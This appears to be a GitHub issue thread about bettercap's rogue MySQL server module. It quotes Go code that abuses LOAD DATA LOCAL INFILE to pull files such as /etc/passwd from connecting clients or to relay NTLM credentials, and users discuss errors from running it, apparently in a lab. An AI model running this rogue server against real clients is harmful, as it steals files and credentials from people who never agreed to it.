for mysql.Running() { | |
// tcp listener | |
conn, err := mysql.listener.AcceptTCP() | |
if err != nil { | |
log.Warning("Error while accepting TCP connection: %s", err) | |
continue | |
} | |
// send the mysql greeting | |
conn.Write([]byte(MySQLGreeting)) | |
// read the incoming responses and retrieve infile | |
// TODO: include binary support and files > 16kb | |
b := make([]byte, 16384) | |
bufio.NewReader(conn).Read(b) | |
// parse client capabilities and validate connection | |
// TODO: parse mysql connections properly and | |
// display additional connection attributes | |
clientCapabilities := fmt.Sprintf("%08b", (int(uint32(b[4]) | uint32(b[5])<<8))) | |
if len(clientCapabilities) == 16 { | |
remoteAddress := strings.Split(conn.RemoteAddr().String(), ":")[0] | |
log.Info("MySQL connection from: %s", remoteAddress) | |
loadData := string(clientCapabilities[8]) | |
log.Info("Can Use LOAD DATA LOCAL: %s", loadData) | |
username := bytes.Split(b[36:], []byte{0})[0] | |
log.Info("MySQL Login Request Username: %s", username) | |
// send initial responseOK | |
conn.Write([]byte(FirstResponseOK)) | |
bufio.NewReader(conn).Read(b) | |
conn.Write([]byte(GetFile)) | |
infileLen, err := bufio.NewReader(conn).Read(b) | |
if err != nil { | |
log.Warning("Error while reading buffer: %s", err) | |
continue | |
} | |
// check if the infile is an UNC path | |
if strings.HasPrefix(mysql.infile, "\\") { | |
log.Info("NTLM from '%s' relayed to %s", remoteAddress, mysql.infile) | |
} else { | |
// print the infile content, ignore mysql protocol headers | |
// TODO: include binary support and output to a file | |
log.Info("Retrieving '%s' from %s (%d bytes)\n%s", mysql.infile, remoteAddress, infileLen-9, string(b)[4:infileLen-4]) | |
} | |
// send additional response | |
conn.Write([]byte(SecondResponseOK)) | |
bufio.NewReader(conn).Read(b) | |
} | |
defer conn.Close() | |
(...) |
You can try to use other Rogue MySQL clients like the one below:
https://github.com/allyshka/Rogue-MySql-Server/blob/master/rogue_mysql_server.py
The best thing to do would be to set up a MariaDB 10.3.22 server, use a client to run a LOAD DATA INFILE query, capture the MySQL packets and try to replay them (see the snippets below for an example):
https://github.com/allyshka/Rogue-MySql-Server/blob/master/rogue_mysql_server.py#L112-L114
load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
The post below is a good (and more recent) reference:
OK, I'll give it a try. I first tried https://github.com/allyshka/Rogue-MySql-Server/blob/master/rogue_mysql_server.py, but it spat out a lot of exceptions, and after reading your post https://w00tsec.blogspot.com/2018/04/abusing-mysql-local-infile-to-read.html I thought I'd give bettercap a try since everything is integrated.
#python rogue_mysql_server.py
error: uncaptured python exception, closing channel <__main__.http_request_handler connected 10.10.10.187:49106 at 0x7fcd7c36f050> (<type 'exceptions.ValueError'>: [/usr/lib/python2.7/asyncore.py|read|83] [/usr/lib/python2.7/asyncore.py|handle_read_event|449] [/usr/lib/python2.7/asynchat.py|handle_read|147] [rogue_mysql_server.py|found_terminator|184])
Just to let you know that your module works great, and that I was to blame. The error came from a malformed SQL query.
Hey again, I'm having an issue with this tool related to bettercap/bettercap#572. Basically I get
[sys.log] [war] mysql.server unpexpected buffer size 4
error (I actually also corrected the typo in the main code). I don't really know what it means or how to troubleshoot it.
FYI:
Do you think you could help?